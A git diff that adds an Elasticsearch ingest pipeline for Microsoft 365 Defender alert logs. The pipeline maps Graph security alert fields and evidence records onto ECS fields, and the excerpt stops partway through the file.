diff --git a/packages/m365_defender/data_stream/alert/elasticsearch/ingest_pipeline/default.yml b/packages/m365_defender/data_stream/alert/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..1259b5c4eaf
--- /dev/null
+++ b/packages/m365_defender/data_stream/alert/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,2539 @@ +--- +description: Pipeline for processing Alert logs. +processors: + - set: + field: ecs.version + tag: set_ecs_version + value: '8.11.0' + - set: + field: event.kind + tag: set_event_kind + value: alert + - rename: + field: message + tag: rename_message_to_event_original + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + tag: json_event_original + target_field: json + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - fingerprint: + fields: + - json.id + - json.lastUpdateDateTime + - json.incidentId + - json.providerAlertId + tag: fingerprint_processor + target_field: _id + ignore_missing: true + - script: + description: Dynamically map event.category and event.type field from evidence. + tag: script_to_set_event_category_and_type + lang: painless + if: ctx.json?.evidence instanceof List + params: + '#microsoft.graph.security.analyzedMessageEvidence': email + '#microsoft.graph.security.mailboxEvidence': email + '#microsoft.graph.security.mailClusterEvidence': email + '#microsoft.graph.security.deviceEvidence': host + '#microsoft.graph.security.fileEvidence': file + '#microsoft.graph.security.ipEvidence': network + '#microsoft.graph.security.processEvidence': process + '#microsoft.graph.security.registryValueEvidence': registry + '#microsoft.graph.security.registryKeyEvidence': registry + '#microsoft.graph.security.userEvidence': iam + '#microsoft.graph.security.securityGroupEvidence': iam + malware: malware + malicioususeractivity: malware + phishing: email + apt: threat + source: > + def eventCategory = new HashSet(); + def eventType = new HashSet(); + for (evidence in ctx.json.evidence) { + String mapping = params[evidence["@odata.type"]]; + if (mapping != null) { + 
eventCategory.add(mapping); + if(eventCategory.contains('registry')){ + eventType.add('access'); + } + else if(eventCategory.contains('threat')){ + eventType.add('indicator'); + } + else{ + eventType.add('info'); + } + } + } + if(ctx.json?.determination != null){ + String mapping = params[ctx.json.determination.toLowerCase()]; + if(mapping != null) { + eventCategory.add(mapping); + if(eventCategory.contains('threat')){ + eventType.add('indicator'); + } + else{ + eventType.add('info'); + } + } + } + if (!eventType.isEmpty()) { + def type = new ArrayList(); + for(def t:eventType) { + type.add(t); + } + Collections.sort(type); + ctx.event.type = type; + } + if (!eventCategory.isEmpty()) { + def category = new ArrayList(); + for(def c:eventCategory) { + category.add(c); + } + Collections.sort(category); + ctx.event.category = category; + } + - dot_expander: + field: '@odata.type' + tag: dot_expander_@odata_type + path: json + override: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.@odata.type + tag: rename_@odata_type + target_field: m365_defender.alert.odata_type + ignore_missing: true + - date: + field: json.lastUpdateDateTime + tag: date_lastUpdateDateTime + formats: + - ISO8601 + if: ctx.json?.lastUpdateDateTime != null && ctx.json.lastUpdateDateTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: m365_defender.alert.last_update_datetime + tag: set_last_update_datetime + copy_from: '@timestamp' + ignore_empty_value: true + - rename: + field: json.description + tag: rename_description + 
target_field: m365_defender.alert.description + ignore_missing: true + - set: + field: message + tag: set_message + copy_from: m365_defender.alert.description + ignore_empty_value: true + - rename: + field: json.tenantId + tag: rename_tenantId + target_field: m365_defender.alert.tenant_id + ignore_missing: true + - set: + field: cloud.account.id + tag: set_cloud_account_id + copy_from: m365_defender.alert.tenant_id + ignore_empty_value: true + - date: + field: json.createdDateTime + tag: date_createdDateTime + target_field: m365_defender.alert.created_datetime + formats: + - ISO8601 + if: ctx.json?.createdDateTime != null && ctx.json.createdDateTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.created + tag: set_event_created + copy_from: m365_defender.alert.created_datetime + ignore_empty_value: true + - date: + field: json.lastActivityDateTime + tag: date_lastActivityDateTime + target_field: m365_defender.alert.last_activity_datetime + formats: + - ISO8601 + if: ctx.json?.lastActivityDateTime != null && ctx.json.lastActivityDateTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.end + tag: set_event_end + copy_from: m365_defender.alert.last_activity_datetime + ignore_empty_value: true + - rename: + field: json.id + tag: rename_id + target_field: m365_defender.alert.id + ignore_missing: true + - set: + field: event.id + tag: set_event_id + copy_from: m365_defender.alert.id + ignore_empty_value: true + - rename: + field: json.serviceSource + tag: rename_serviceSource + target_field: 
m365_defender.alert.service_source + ignore_missing: true + - set: + field: event.provider + tag: set_event_provider + copy_from: m365_defender.alert.service_source + ignore_empty_value: true + - rename: + field: json.severity + tag: rename_severity + target_field: m365_defender.alert.severity + ignore_missing: true + - set: + field: event.severity + tag: set_event_severity_1 + value: 1 + if: ctx.m365_defender?.alert?.severity?.toLowerCase() == 'informational' + - set: + field: event.severity + tag: set_event_severity_2 + value: 2 + if: ctx.m365_defender?.alert?.severity?.toLowerCase() == 'low' + - set: + field: event.severity + tag: set_event_severity_3 + value: 3 + if: ctx.m365_defender?.alert?.severity?.toLowerCase() == 'medium' + - set: + field: event.severity + tag: set_event_severity_4 + value: 4 + if: ctx.m365_defender?.alert?.severity?.toLowerCase() == 'high' + - date: + field: json.firstActivityDateTime + tag: date_firstActivityDateTime + target_field: m365_defender.alert.first_activity_datetime + formats: + - ISO8601 + if: ctx.json?.firstActivityDateTime != null && ctx.json.firstActivityDateTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.start + tag: set_event_start + copy_from: m365_defender.alert.first_activity_datetime + ignore_empty_value: true + - script: + description: Determine event.duration from starting and ending activity timestamp. 
+ tag: script_event_duration + lang: painless + if: ctx.event?.start != null && ctx.event?.end != null + source: + Instant eventstart = ZonedDateTime.parse(ctx.event?.start).toInstant(); + Instant eventend = ZonedDateTime.parse(ctx.event?.end).toInstant(); + ctx.event['duration'] = ChronoUnit.NANOS.between(eventstart, eventend); + - uri_parts: + field: json.alertWebUrl + tag: uri_parts_alertWebUrl + target_field: m365_defender.alert.web_url + if: ctx.json?.alertWebUrl != null + keep_original: true + on_failure: + - remove: + field: json.alertWebUrl + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.url + tag: set_event_url + copy_from: m365_defender.alert.web_url.original + ignore_empty_value: true + - rename: + field: json.assignedTo + tag: rename_assignedTo + target_field: m365_defender.alert.assigned_to + ignore_missing: true + - append: + field: related.user + tag: append_related_user + value: '{{{m365_defender.alert.assigned_to}}}' + if: ctx.m365_defender?.alert?.assigned_to != null + allow_duplicates: false + - set: + field: source.user.name + tag: set_source_user_name + copy_from: m365_defender.alert.assigned_to + ignore_empty_value: true + - rename: + field: json.threatFamilyName + tag: rename_threatFamilyName + target_field: m365_defender.alert.threat_family_name + ignore_missing: true + - set: + field: threat.group.name + tag: set_threat_group_name + copy_from: m365_defender.alert.threat_family_name + ignore_empty_value: true + - rename: + field: json.category + tag: rename_category + target_field: m365_defender.alert.category + ignore_missing: true + - append: + field: threat.tactic.name + tag: append_threat_tactic_name + value: '{{{m365_defender.alert.category}}}' + if: ctx.m365_defender?.alert?.category != null + allow_duplicates: false + 
- rename: + field: json.mitreTechniques + tag: rename_mitreTechniques + target_field: m365_defender.alert.mitre_techniques + ignore_missing: true + - set: + field: threat.technique.subtechnique.id + tag: set_threat_technique_subtechnique_id + copy_from: m365_defender.alert.mitre_techniques + ignore_empty_value: true + - rename: + field: json.actorDisplayName + tag: rename_actorDisplayName + target_field: m365_defender.alert.actor_display_name + ignore_missing: true + - rename: + field: json.classification + tag: rename_classification + target_field: m365_defender.alert.classification + ignore_missing: true + - foreach: + field: json.comments + tag: foreach_comments + if: ctx.json?.comments instanceof List + processor: + append: + field: related.user + tag: foreach_comments_append_createdByDisplayName + value: '{{{_ingest._value.createdByDisplayName}}}' + allow_duplicates: false + - rename: + field: json.comments + tag: rename_comments + target_field: m365_defender.alert.comments + ignore_missing: true + - rename: + field: json.detectorId + tag: rename_detectorId + target_field: m365_defender.alert.detector_id + ignore_missing: true + - rename: + field: json.detectionSource + tag: rename_detection_source + target_field: m365_defender.alert.detection_source + ignore_missing: true + - rename: + field: json.determination + tag: rename_determination + target_field: m365_defender.alert.determination + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_createdDateTime + if: ctx.json?.evidence instanceof List + processor: + date: + field: _ingest._value.createdDateTime + tag: date_foreach_evidence_createdDateTime + target_field: _ingest._value.created_datetime + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.createdDateTime + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_remediationStatus + if: ctx.json?.evidence instanceof List + processor: + rename: + field: 
_ingest._value.remediationStatus + tag: foreach_rename_remediationStatus + target_field: _ingest._value.remediation_status + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evident_ipInterfaces + if: ctx.json?.evidence instanceof List + processor: + foreach: + field: _ingest._value.ipInterfaces + tag: inside_foreach_convert_ipInterfaces + ignore_missing: true + processor: + convert: + field: _ingest._value + tag: foreach_convert_ipInterfaces + type: ip + ignore_missing: true + on_failure: + - remove: + field: _ingest._value + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_ip_interfaces + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.ipInterfaces + tag: rename_foreach_ip_interfaces + target_field: _ingest._value.ip_interfaces + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_detailedRoles + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.detailedRoles + tag: rename_foreach_detailedRoles + target_field: _ingest._value.detailed_roles + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_remediationStatusDetails + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.remediationStatusDetails + tag: rename_foreach_remediationStatusDetails + target_field: _ingest._value.remediation_status_details + ignore_missing: true + - rename: + field: json.incidentId + tag: rename_incidentId + target_field: m365_defender.alert.incident_id + ignore_missing: true + - uri_parts: + field: json.incidentWebUrl + tag: uri_parts_incidentWebUrl + target_field: m365_defender.alert.incident_web_url + if: ctx.json?.incidentWebUrl 
!= null + keep_original: true + on_failure: + - remove: + field: json.incidentWebUrl + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.providerAlertId + tag: rename_providerAlertId + target_field: m365_defender.alert.provider_alert_id + ignore_missing: true + - rename: + field: json.recommendedActions + tag: rename_recommendedActions + target_field: m365_defender.alert.recommended_actions + ignore_missing: true + - date: + field: json.resolvedDateTime + tag: date_resolvedDateTime + target_field: m365_defender.alert.resolved_datetime + formats: + - ISO8601 + if: ctx.json?.resolvedDateTime != null && ctx.json.resolvedDateTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.status + tag: rename_status + target_field: m365_defender.alert.status + ignore_missing: true + - rename: + field: json.threatDisplayName + tag: rename_threatDisplayName + target_field: m365_defender.alert.threat_display_name + ignore_missing: true + - rename: + field: json.title + tag: rename_title + target_field: m365_defender.alert.title + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_dot_expander + if: ctx.json?.evidence instanceof List + processor: + dot_expander: + field: '@odata.type' + path: _ingest._value + ignore_failure: true + override: true + - foreach: + field: json.evidence + tag: foreach_evidence_@0data + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.@odata.type + tag: foreach_rename_evidence_@odata + target_field: _ingest._value.odata_type + 
ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_receivedDateTime + if: ctx.json?.evidence instanceof List + processor: + date: + field: _ingest._value.receivedDateTime + tag: date_foreach_evidence_receivedDateTime + target_field: _ingest._value.received_datetime + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.receivedDateTime + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_email_Delivery_timestamp + if: ctx.json?.evidence instanceof List + processor: + append: + field: email.delivery_timestamp + tag: append_foreach_evidence_email_Delivery_timestamp + value: '{{{_ingest._value.received_datetime}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_antiSpamDirection + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.antiSpamDirection + tag: rename_foreach_antispam_direction + target_field: _ingest._value.antispam_direction + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_email_direction + if: ctx.json?.evidence instanceof List + processor: + append: + field: email.direction + tag: append_foreach_evidence_email_direction + value: '{{{_ingest._value.antispam_direction}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_append_email_subject + if: ctx.json?.evidence instanceof List + processor: + append: + field: email.subject + tag: append_foreach_evidence_email_subject + value: '{{{_ingest._value.subject}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_recipientEmailAddress + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.recipientEmailAddress + tag: rename_foreach_evidence_recipientEmailAddress + target_field: _ingest._value.recipient_email_address + ignore_missing: true + - foreach: + field: json.evidence + tag: 
foreach_evidence_append_related_user + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_evidence_related_user + value: '{{{_ingest._value.recipient_email_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_append_email_to_address + if: ctx.json?.evidence instanceof List + processor: + append: + field: email.to.address + tag: append_foreach_evidence_email_to_address + value: '{{{_ingest._value.recipient_email_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_convert_evidence_attachmentsCount + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.attachmentsCount + tag: convert_foreach_evidence_attachmentsCount + target_field: _ingest._value.attachments_count + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.attachmentsCount + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_rename_deliveryAction + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.deliveryAction + tag: rename_foreach_evidence_deliveryAction + target_field: _ingest._value.delivery_action + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_deliveryLocation + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.deliveryLocation + tag: rename_foreach_evidence_deliveryLocation + target_field: _ingest._value.delivery_location + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_internetMessageId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.internetMessageId + tag: 
rename_foreach_evidence_internetMessageId + target_field: _ingest._value.internet_message_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_networkMessageId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.networkMessageId + tag: rename_foreach_evidence_networkMessageId + target_field: _ingest._value.network_message_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_dot_expander_evidence_p1Sender + if: ctx.json?.evidence instanceof List + processor: + dot_expander: + field: '@odata.type' + path: _ingest._value.p1Sender + ignore_failure: true + override: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_odata_type + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p1Sender.@odata.type + tag: rename_foreach_evidence_odata_type + target_field: _ingest._value.p1_sender.odata_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_p2Sender + if: ctx.json?.evidence instanceof List + processor: + dot_expander: + field: '@odata.type' + path: _ingest._value.p2Sender + ignore_failure: true + override: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_p2Sender_odata_type + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p2Sender.@odata.type + tag: rename_foreach_evidence_p2Sender_odata_type + target_field: _ingest._value.p2_sender.odata_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_displayName + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p1Sender.displayName + tag: rename_foreach_p2Sender_displayName + target_field: _ingest._value.p1_sender.display_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_p1Sender_Display_name + if: ctx.json?.evidence instanceof List + processor: + 
append: + field: related.user + tag: append_foreach_evidence_p1Sender_Display_name + value: '{{{_ingest._value.p1_sender.display_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_p1sender_domain_name + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p1Sender.domainName + tag: rename_foreach_evidence_p1sender_domainName + target_field: _ingest._value.p1_sender.domain_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_append_related_hosts_p1sender_domain_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hosts + tag: append_foreach_rename_evidence_related_hosts_p1sender_domain_name + value: '{{{_ingest._value.p1_sender.domain_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_rename_evidence_p1sender_emailAddress + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p1Sender.emailAddress + tag: rename_foreach_evidence_p1sender_emailaddress + target_field: _ingest._value.p1_sender.email_address + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_email_from_adress + if: ctx.json?.evidence instanceof List + processor: + append: + field: email.from.address + tag: append_foreach_evidence_email_from_adress + value: '{{{_ingest._value.p1_sender.email_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_append_evidence_related_user_p1sender_emailaddress + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_evidence_related_user_p1sender_emailaddress + value: '{{{_ingest._value.p1_sender.email_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_rename_evidence_p2sender_displayname + if: ctx.json?.evidence instanceof List + processor: + rename: + field: 
_ingest._value.p2Sender.displayName + tag: rename_foreach_evidence_p2sender_displayname + target_field: _ingest._value.p2_sender.display_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_user_p2sender_display_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_evidence_user_p2sender_display_name + value: '{{{_ingest._value.p2_sender.display_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_p2sender_domain_name + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p2Sender.domainName + tag: rename_foreach_evidence_p2sender_domain_name + target_field: _ingest._value.p2_sender.domain_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_hosts_p2sender_domain_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hosts + tag: append_foreach_evidence_hosts_p2sender_domain_name + value: '{{{_ingest._value.p2_sender.domain_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_p2sender_email_address + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p2Sender.emailAddress + tag: rename_foreach_evidence_p2sender_emailAddress + target_field: _ingest._value.p2_sender.email_address + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_append_evidence_p2sender_emailaddress + if: ctx.json?.evidence instanceof List + processor: + append: + field: email.from.address + tag: append_foreach_evidence_p2sender_emailaddress + value: '{{{_ingest._value.p2_sender.email_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_append_user_p2sender_email_address + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_user_p2sender_email_address + 
value: '{{{_ingest._value.p2_sender.email_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_convert_senderIp + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.senderIp + tag: convert_foreach_evidence_senderIp + target_field: _ingest._value.sender_ip + type: ip + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.senderIp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_append_related_ip_sender_ip + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.ip + tag: append_foreach_evidence_related_ip_sender_ip + value: '{{{_ingest._value.sender_ip}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_threatDetectionMethods + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.threatDetectionMethods + tag: rename_foreach_evidence_threatDetectionMethods + target_field: _ingest._value.threat_detection_methods + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_convert_urlCount + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.urlCount + tag: convert_foreach_evidence_urlCount + target_field: _ingest._value.url_count + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.urlCount + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_convert_instanceId + if: ctx.json?.evidence 
instanceof List
+ processor:
+ convert:
+ field: _ingest._value.instanceId
+ tag: convert_foreach_evidence_instanceId
+ target_field: _ingest._value.instance_id
+ type: string
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.instanceId
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_cloud_instance_id
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: cloud.instance.id
+ tag: append_foreach_evidence_cloud_instance_id
+ value: '{{{_ingest._value.instance_id}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_rename_evidence_instanceName
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.instanceName
+ tag: rename_foreach_evidence_instanceName
+ target_field: _ingest._value.instance_name
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_cloud_instance_name
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: cloud.instance.name
+ tag: append_foreach_evidence_cloud_instance_name
+ value: '{{{_ingest._value.instance_name}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_convert_appId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ convert:
+ field: _ingest._value.appId
+ tag: convert_foreach_evidence_appID
+ target_field: _ingest._value.app_id
+ type: string
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.appId
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_displayName
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.displayName
+ tag: rename_foreach_evidence_display_name
+ target_field: _ingest._value.display_name
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_convert_saasAppId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ convert:
+ field: _ingest._value.saasAppId
+ tag: convert_foreach_evidence_saasAppId
+ target_field: _ingest._value.saas_app_id
+ type: string
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.saasAppId
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_vmMetadata_cloudProvider
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.vmMetadata.cloudProvider
+ tag: rename_foreach_evidence_vmMetadata_cloudProvider
+ target_field: _ingest._value.vm_metadata.cloud_provider
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_mdaDeviceId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.mdeDeviceId
+ tag: rename_foreach_evidence_mdaDeviceId
+ target_field: _ingest._value.mde_device_id
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_mdaDeviceId_into_related_hosts
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.hosts
+ tag: append_foreach_evidence_mdaDeviceId_into_related_hosts
+ value: '{{{_ingest._value.mde_device_id}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_osPlatform
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.osPlatform
+ tag: rename_foreach_osPlatform
+ target_field: _ingest._value.os_platform
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_host_os_name
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: host.os.name
+ tag: append_foreach_evidence_host_os_name
+ value: '{{{_ingest._value.os_platform}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_os_platform_related_hosts
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.hosts
+ tag: append_foreach_evidence_os_platform_related_hosts
+ value: '{{{_ingest._value.os_platform}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_append_host_os_version
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: host.os.version
+ tag: append_foreach_host_os_version
+ value: '{{{_ingest._value.version}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_append_version_into_related_hosts
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.hosts
+ tag: append_foreach_version_into_related_hosts
+ value: '{{{_ingest._value.version}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_rename_evidence_azureAdDeviceId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.azureAdDeviceId
+ tag: rename_foreach_evidence_azureAdDeiveId
+ target_field: _ingest._value.azure_ad_device_id
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_defenderAvStatus
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.defenderAvStatus
+ tag: rename_foreach_evidence_defenderAvStatus
+ target_field: _ingest._value.defender_av_status
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_deviceDnsName
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.deviceDnsName
+ tag: rename_foreach_evidece_deviceDnsName
+ target_field: _ingest._value.device_dns_name
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_hosts_device_dns_name
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.hosts
+ tag: append_foreach_evidence_hosts_device_dns_name
+ value: '{{{_ingest._value.device_dns_name}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_date_firstSeenDateTime
+ if: ctx.json?.evidence instanceof List
+ processor:
+ date:
+ field: _ingest._value.firstSeenDateTime
+ tag: date_foreach_firstSeenDateTime
+ target_field: _ingest._value.first_seen_datetime
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.firstSeenDateTime
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_healthStatus
+ if: ctx.json?.evidence instanceof List
